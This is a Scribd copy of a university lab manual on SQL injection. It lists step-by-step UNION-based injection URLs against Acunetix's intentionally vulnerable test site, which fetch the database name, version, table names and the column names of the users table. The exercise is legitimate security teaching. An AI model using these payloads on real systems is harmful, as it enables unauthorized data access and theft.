Scribd
Upload
69 views4 pages

Experiment 4

This lab manual describes how to perform an SQL injection attack from a command line URL to demonstrate SQL injection vulnerabilities. It provides steps to gather information like the database name and version by injecting queries. The document shows retrieving table and column names from the database using techniques like concatenation. Successfully extracting column names from the users table indicates the test site is vulnerable to SQL injection attacks.

Uploaded by

Kshitiz Sharma
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
69 views4 pages

Experiment 4

This lab manual describes how to perform an SQL injection attack from a command line URL to demonstrate SQL injection vulnerabilities. It provides steps to gather information like the database name and version by injecting queries. The document shows retrieving table and column names from the database using techniques like concatenation. Successfully extracting column names from the users table indicates the test site is vulnerable to SQL injection attacks.

Uploaded by

Kshitiz Sharma
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

Lab Manual

Web and Mobile Security (CSP/ITP-338)

Exp No: 4

Aim: Working of SQL injection attack.

Objective: SQL Injection Attack from command line(url).

Software/Hardware Requirements:Windows 7 & above version

Tools to be used:

1. SQLMAP
2. Acunetix

Introduction: SQL Injection (SQLi) is a type of an injection attack that makes


it possible to execute malicious SQL statements. These statements control a
database server behind a web application. Attackers can use SQL Injection
vulnerabilities to bypass application security measures. They can go around
authentication and authorization of a web page or web application and retrieve
the content of the entire SQL database. They can also use SQL Injection to add,
modify, and delete records in the database.

How and Why Is an SQL Injection Attack Performed

 Attackers can use SQL Injections to find the credentials of other users in
the database. They can then impersonate these users. The impersonated
user may be a database administrator with all database privileges.
 SQL lets you select and output data from the database. An SQL Injection
vulnerability could allow the attacker to gain complete access to all data
in a database server.
 SQL also lets you alter data in a database and add new data. For example,
in a financial application, an attacker could use SQL Injection to alter
balances, void transactions, or transfer money to their account.
 You can use SQL to delete records from a database, even drop tables.
Even if the administrator makes database backups, deletion of data could
affect application availability until the database is restored. Also, backups
may not cover the most recent data.
 In some database servers, you can access the operating system using the
database server. This may be intentional or accidental. In such case, an
attacker could use an SQL Injection as the initial vector and then attack
the internal network behind a firewall.

Reading Material (add reference links along with material):


https://owasp.org/www-community/attacks/SQL_Injection

Steps/Method/Coding:

 Open given below targeted URL in the browser.


 Open the link- http://testphp.vulnweb.com/
 Go to- http://testphp.vulnweb.com/listproducts.php?cat=1
 You'll inject the malicious code (cheat code)-
http://testphp.vulnweb.com/listproducts.php?cat=-1’
 Put the random number, cheat code -
http://testphp.vulnweb.com/listproducts.php?cat=-1 order by 11 clause to
check the row (tuple).
 Information gathering-
 To check the database name, Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,database( )--
 To check the database version ,Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,version()—
 Information to be fetch-
 Table name- cat=-1 union select
1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from
information_schema.tables where table_schema=database()--
 http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select
%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from
%20information_schema.tables%20where%20table_schema=database()--
 Column name- http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select
%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from
%20information_schema.columns%20where
%20table_name=0x7573657273
Output screenshot:

In the given screenshot you can see we have got an error message which means
the running site is infected by SQL injection.

Maybe we can get some important data from the users table, so let’s penetrate
more inside.  Again Use the concat function for table users for retrieving its
entire column names.

We successfully retrieve all eight column names from inside the table users.
Learning Outcomes:

After completing this exercise, you will be able to: Detect SQL Injection, You
completed the following exercises: - SQL Injection Techniques, Launch a SQL
Injection Attack Launch a SQL Injection Attack from command line(url).

 In the above screenshot you can see we have got an error message which
means the running site is infected by SQL injection.
 Now using ORDER BY keyword to sort the records in ascending or
descending order 
 Use the next query to fetch the name of the database
 Next query will extract the version of the database system
 Through the next query, we will try to fetch table name inside the
database
 We successfully retrieve all eight column names from inside the table
users.

Link for login bypass-

https://infosecwriteups.com/sql-injection-lab-tryhackme-writeup-fcf30f846e82

https://cybersecurityhoy.files.wordpress.com/2021/07/13-sql-injection.pdf

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy